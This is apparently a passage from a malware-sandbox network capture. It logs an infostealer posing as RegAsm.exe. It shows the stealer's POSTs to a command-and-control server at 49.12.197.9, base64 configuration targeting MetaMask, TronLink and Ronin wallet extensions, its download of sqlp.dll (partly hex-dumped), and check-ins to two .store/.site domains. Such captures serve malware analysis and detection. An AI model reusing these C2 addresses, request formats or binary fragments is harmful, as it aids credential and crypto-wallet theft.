                                                                                                                                                                                                                                          2024-10-02 12:44:19 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                          Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          67192.168.2.65859449.12.197.94435316C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:20 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----HDAFHIDGIJKJKECBGDBG
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 332
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:20 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 61 62 34 38 37 63 38 33 65 33 63 64 64 37 64 38 65 39 35 65 38 34 35 39 35 38 65 33 62 61 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------HDAFHIDGIJKJKECBGDBGContent-Disposition: form-data; name="token"cab487c83e3cdd7d8e95e845958e3ba4------HDAFHIDGIJKJKECBGDBGContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------HDAFHIDGIJKJKECBGDBGCont
                                                                                                                                                                                                                                          2024-10-02 12:44:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:20 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:21 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          68192.168.2.658595172.67.208.141443
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:24 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: questionsmw.store
                                                                                                                                                                                                                                          2024-10-02 12:44:24 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:44:24 UTC799INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:24 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=h5allbcb7bdj8q45p0drurng7u; expires=Sun, 26 Jan 2025 06:31:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KQmtpoV8g8wKN8Gzj3woGfQbcFu52ERNHtpnmFiEkfCsbg6jw8U0S4XSI4NReIhKuqbpijWMNMaZC1Su90iL0HBhGlrYC7GRJq%2F3dMboMQ%2F6h1l2P9QI8Hd53Fmw%2B5iy73NC%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c89ccc3578dc-EWR
                                                                                                                                                                                                                                          2024-10-02 12:44:24 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:44:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          69192.168.2.65859749.12.197.94435316C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:25 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----GCFHDAKECFIDGDGDBKJD
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 7201
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:25 UTC7201OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 46 48 44 41 4b 45 43 46 49 44 47 44 47 44 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 61 62 34 38 37 63 38 33 65 33 63 64 64 37 64 38 65 39 35 65 38 34 35 39 35 38 65 33 62 61 34 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 48 44 41 4b 45 43 46 49 44 47 44 47 44 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 48 44 41 4b 45 43 46 49 44 47 44 47 44 42 4b 4a 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------GCFHDAKECFIDGDGDBKJDContent-Disposition: form-data; name="token"cab487c83e3cdd7d8e95e845958e3ba4------GCFHDAKECFIDGDGDBKJDContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------GCFHDAKECFIDGDGDBKJDCont
                                                                                                                                                                                                                                          2024-10-02 12:44:26 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:25 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:26 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          70192.168.2.658599188.114.97.3443
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:25 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: soldiefieop.site
                                                                                                                                                                                                                                          2024-10-02 12:44:25 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:44:26 UTC762INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:26 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=8oeh4a1oisfloqhlm9o6lpd0je; expires=Sun, 26 Jan 2025 06:31:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l8zqcHvTEN251YqJbdUiLjTOtiiakEwDx06xiK3FoQB0Vg66ZHmHVTZZgRV3IXHvYAG5VaLT4K1rTnpLUDIEMSx76pII0B4%2BB1vtwEIqlJhWPs7ewe6EtD1zRMHQ3qMi9ZoR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c8a6bf462369-EWR
                                                                                                                                                                                                                                          2024-10-02 12:44:26 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:44:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          71192.168.2.65859849.12.197.94435316C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:26 UTC192OUTGET /sqlp.dll HTTP/1.1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:26 UTC264INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:26 GMT
                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                          Content-Length: 2459136
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Last-Modified: Wednesday, 02-Oct-2024 12:44:26 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          2024-10-02 12:44:26 UTC16120INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                                                                          2024-10-02 12:44:26 UTC16384INData Raw: d3 b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                          Data Ascii: %:X~e!*FW|>|L1146
                                                                                                                                                                                                                                          2024-10-02 12:44:26 UTC16384INData Raw: 24 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53
                                                                                                                                                                                                                                          Data Ascii: $@:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhS
                                                                                                                                                                                                                                          2024-10-02 12:44:26 UTC16384INData Raw: 83 f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35
                                                                                                                                                                                                                                          Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5
                                                                                                                                                                                                                                          2024-10-02 12:44:26 UTC16384INData Raw: 89 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e
                                                                                                                                                                                                                                          Data Ascii: L$ D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                                                                                                                                                                          2024-10-02 12:44:26 UTC16384INData Raw: 8b 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                          Data Ascii: |$2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                                                                          2024-10-02 12:44:26 UTC16384INData Raw: 24 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                          Data Ascii: $td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                                                                          2024-10-02 12:44:26 UTC16384INData Raw: fe ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14
                                                                                                                                                                                                                                          Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                                                                                                                                                                          2024-10-02 12:44:26 UTC16384INData Raw: 1c 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00
                                                                                                                                                                                                                                          Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                                                                                                                                                          2024-10-02 12:44:26 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4
                                                                                                                                                                                                                                          Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$
